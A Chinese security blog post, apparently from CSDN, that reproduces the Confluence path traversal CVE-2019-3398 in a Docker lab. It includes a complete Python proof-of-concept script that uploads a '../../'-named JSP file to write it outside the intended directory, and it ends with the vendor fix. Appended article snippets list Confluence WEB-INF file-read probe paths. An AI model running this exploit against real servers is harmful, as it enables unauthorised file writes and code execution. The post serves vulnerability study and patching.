(环境搭建+复现)CVE-2019-3398 Confluence路径穿越漏洞

最新推荐文章于 2025-02-08 11:43:50 发布
最新推荐文章于 2025-02-08 11:43:50 发布
阅读量2.5k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/105274370
版权

1、【CVE编号】

CVE-2019-3398

2、【漏洞名称】

Confluence路径穿越漏洞

3、【靶标分类】

Web类型类靶标

4、【影响版本】

2.0.0 <= version < 6.6.13
6.7.0 <= version < 6.12.4
6.13.0 <= version < 6.13.4
6.14.0 <= version < 6.14.3
6.15.0 <= version < 6.15.2

5、【漏洞分类】

目录穿越

6、【漏洞等级】

7、【漏洞简介】

Confluence Server和Data Center在downloadallattachments资源中存在路径穿越漏洞。 在Page或Blogs具有添加附件权限的用户,或具有创建新空间或个人空间权限的用户,或对某空间具有“管理员”权限的用户可利用此路径穿越漏洞将文件写入任意位置。一定条件下可以执行任意代码。

8、【靶标运行环境】

标靶运行操作系统系统:Ubuntu1804 64位
操作系统内核:4.15.0-92-generic
容器版本:confluence 6.13.0
端口号:8090
工具:burpsuite,docker

9、【靶标搭建过程】
1、下载docker环境
docker pull atlassian/confluence-server:6.13.0
2、启动环境
docker run --name confluence2 -p 8090:8090 -dit 2fc70ced2023
在这里插入图片描述
3、访问192.168.152.130:8090
不选择进入下一步
在这里插入图片描述
4、去申请一个key
在这里插入图片描述
5、选择一个虚拟的数据库
在这里插入图片描述
6、选择一个示例网站
在这里插入图片描述
7、通过confluence创建管理员
在这里插入图片描述
8、添加管理员
在这里插入图片描述
9、安装完成
在这里插入图片描述
10、靶场利用过程
1、创建一个新的项目ceshi
在这里插入图片描述
2、上传shell.jsp
在这里插入图片描述
3、在filename字段添加…/…/
在这里插入图片描述
4、点击下载全部触发漏洞
在这里插入图片描述
在这里插入图片描述
5、这个时候我们可以看到shell.jsp本应在temp/download2NDvc105653.zi中
但是由于加了…/…/,就穿越到了上两级目录当中
docker exec -it f3bcd43f83cb bash(进入容器)

在这里插入图片描述
6、此处有一python可以快速实现此过程

import requests
from bs4 import BeautifulSoup
import base64

url = 'http://192.168.152.130:8090/'
proxies={'http':'http://127.0.0.1:8080'}

values = {'os_username':'admin',
'os_password':'123qweQWE',
'login':'Log+in',
'os_destination':''}

headers = {
    'accept': '*/*',
    'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}

jspshell ='Y3ZlLTIwMTktMzM5OA=='

session = requests.Session()

login = session.post(url + 'dologin.action', headers=headers, data=values)

soup = BeautifulSoup(login.text, 'html.parser')

csrf_token = soup.select_one('meta[name="atlassian-token"]').get('content',None)

createpage = session.get(url + 'pages/createpage.action')

soup = BeautifulSoup(createpage.text, 'html.parser')

draft_id = soup.select_one('meta[name="ajs-draft-id"]').get('content',None)

attach = session.post(url + 'plugins/drag-and-drop/upload.action?draftId=' + draft_id + '&filename=../../test1.jsp&size=13&mimeType=text%2fplain&atl_token=' + csrf_token,headers=headers,data=base64.b64decode(jspshell))

downloadallattachments = session.get(url + 'pages/downloadallattachments.action?pageId=' + draft_id, headers=headers
                                     )

if downloadallattachments.status_code == 200:
    print('Success!')
else:
    print('Something went wrong.')

7、进入Desktop目录
python3 cve-2019-3398.py
在这里插入图片描述
8、查看confluence目录
docker exec -it f3bcd43f83cb bash
在这里插入图片描述

11、【解决方案】
从官网下载修复版6.13.4。
对比文件发现,在6.13.4版本的DownloadAllAttachmentsOnPageAction.java文件中,
对attachment.getFileName()得到的字符串进行了过滤

import com.atlassian.confluence.util.io.ConfluenceFileUtils;
ConfluenceFileUtils.extractFileName(attachment.getFileName()))

Referer:
https://xz.aliyun.com/t/4854
https://github.com/superevr/cve-2019-3398/blob/master/poc.py

vulhub通关实战一(附docker vulhub 虚拟机环境
悦分享
12-26 1987
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
CVE-2019-0708——RDP漏洞利用
热门推荐
迷风小白
07-03 6万+
背景介绍 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7 环境: 攻击机:kali IP:192....
FireEye 红队失窃工具大揭秘之:分析复现 Confluence路径穿越漏洞 (CVE-2019-3398)
smellycat000的专栏
12-11 602
聚焦源代码安全,网罗国内外最新资讯!前言最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗。虽然目前尚不清楚这些红队...
Confluence 目录穿越漏洞导致代码执行CVE-2019-3398
weixin_34187822的博客
04-19 399
0x00 漏洞详情 Confluence Server和Data Center产品在downloadallattachments资源中存在一个路径穿越漏洞。有权向页面和(或)博客添加附件,或创建新空间或个人空间,或者对空间具有“管理员”权限的远程***者可以利用此漏洞将文件写入任意位置,最终导致远程代码执行。 0x01 影响范围 0x02 修复建议 升级Confluence Server或Dat...
路径穿越-
最新发布
weixin_68491709的博客
02-08 550
路径穿越(Path Traversal),也称为目录遍历,是一种安全漏洞,攻击者利用该漏洞可以访问系统中本不应被访问的文件或目录。通过构造特定的输入,攻击者可以绕过应用程序的安全机制,访问敏感文件或执行未授权的操作。
ATLASSIAN CONFLUENCE 远程代码执行漏洞CVE-2022-26134)漏洞复现
Websec
06-07 1314
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一
u8 附件上传后存放路径_Confluence 路径穿越漏洞分析(CVE20193398
weixin_39876650的博客
12-08 790
0x01 漏洞概述Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blo...
红队攻击:初始访问
07-12 7136
【红队攻击】文章系列第【3】篇:《初始访问》
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)
JiangBuLiu的博客
06-28 2155
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/confluence/CVE-2019-3396/ 漏洞原理 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本...
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)
qq_45391176的博客
11-09 342
CVE-2019-3396 利用vulhub复现过程
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)复现
玄道的网安博客
01-18 764
简介 Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。 影响版本 6.6.12版本之前所有版本 6.7.0-6.12.2版本 6.13.3之前的所有6.13.x版本 6.14.2之前的所有6.14.x版本 环境搭建 这里使用vulhub来安装 地址: https://github.com/vulhub/vulhub/tree/m...
vulhub复现记录
书山有路勤为径,学海无涯苦作舟
10-16 1987
看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的将在 年 月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。
CVE-2019-3399:[Jira Data Center]Information disclosure in the BrowseProjects.jspa resource
公众号shadow sock7
05-14 351
由于 Project archiving is available for Jira Software Data Center and Jira Service Desk Data Center. https://confluence.atlassian.com/adminjiraserver/archiving-a-project-938847621.html 这个功能只在Data Cent...
CVECVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 4598
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 944
vulhub靶场复现【postgresql】
Confluence文件读取漏洞复现
Websec
03-06 1475
1、Confluence系统都存在漏洞漏洞poc如下: /s/xx/_/;/WEB-INF/web.xml /s/xx/_/;/WEB-INF/decorators.xml /s/xx/_/;/WEB-INF/classes/seraph-config.xml /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties /s/xx/_/;/META-INF/maven/com.atlassian.jir
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2718
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复,修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
CVE-2017-15715漏洞复现
大方子
07-25 1万+
复现环境 docke apache 2.4.0到2.4.29即可 php5.5 复现过程 先在物理机上创建目录 mkdir -p /var/www/html 然后创建个容器,并关联物理机的/var/www/html目录 docker run -d -v /var/www/html:/var/www/html -p 8080:80 --name apache php...
(环境搭建+复现) CVE-2020-0674 IE远程代码执行漏洞
daxi0ng的博客
04-05 3105
1、【CVE编号】 CVE-2020-0674 2、【漏洞名称】 IE远程代码执行漏洞 3、【靶标分类】 Web浏览器类型靶标 4、【影响版本】 Internet Explorer 10 Windows Server 2012 Internet Explorer 11 Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 180...
复现CVE-2019-0708漏洞:MetaSploit攻击教程
"本课程详细介绍了如何使用MetaSploit框架对CVE-2019-0708(BlueKeep)漏洞进行攻击复现。作者是陈殷,内容来源于山丘安全攻防实验室。课程中涉及到的主要步骤包括安装MetaSploit的特定攻击模块,以及在Linux环境中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值